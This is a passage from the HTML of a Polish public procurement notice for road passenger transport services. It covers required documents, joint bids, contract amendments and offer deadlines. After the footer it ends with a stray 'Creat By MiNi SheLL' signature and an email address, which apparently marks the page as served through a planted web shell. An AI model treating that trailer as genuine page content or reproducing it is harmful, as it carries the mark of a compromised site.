ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - załącznik do SWZ<br/><br/><br/>2) Odpis lub<br/>informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">21.4.	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami (wykaz pojazdów);</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 21.3.	koncesji, zezwolenia, licencji lub dokumentu potwierdzającego, że wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w państwie członkowskim Unii Europejskiej, w którym wykonawca ma siedzibę lub miejsce zamieszkania - licencja do przewozu osób w krajowym transporcie drogowym wymagane ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j.: Dz. U. z 2019 r., poz. 2140 z późn. zm.). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) formularz oferty<br/>2) oświadczenia w zakresie wskazanym przez Zamawiającego w SWZ<br/>3) pełnomocnictwa – jeżeli oferta nie jest podpisana przez osobę upoważnioną i wykazaną w KRS <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/><br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy biorący udział w postępowaniu. <br/><br/><br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/><br/>3. W przypadku Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w SWZ, składa każdy z wykonawców. <br/><br/><br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie.<br/><br/><br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany postanowień niniejszej umowy wymagają formy pisemnej pod rygorem nieważności. <br/>2.	Umowa może zostać zmieniona w przypadku: <br/>a)	zmiany przepisów prawa; <br/>b)	zmiany danych adresowych Zamawiającego lub Wykonawcy;<br/>c)	w przypadku jeżeli zmiana umowy jest korzystna dla Zamawiającego;<br/>d)	w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie wszczęcia postępowania przetargowego, a które są niezbędne dla prawidłowej realizacji zamówienia:<br/>3.	Zamawiający dopuszcza zmianę terminu realizacji zamówienia przy wystąpieniu istotnych okoliczności po stronie Zamawiającego,<br/>4.	Zamawiający nie dopuszcza zmiany terminu realizacji zamówienia z winy Wykonawcy. <br/>5.	Wszelkie zmiany do umowy wymagają zgody obydwu stron. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://powiattorunski.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający ogranicza liczbę wykonawców, których zaprosi do negocjacji do 3 wykonawców spełniających w najwyższym stopniu kryteria oceny ofert określone w SWZ. W przypadku gdy liczba wykonawców, którzy złożyli oferty niepodlegające odrzuceniu jest mniejsza niż 3, Zamawiający zaprosi wszystkich wykonawców do negocjacji.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com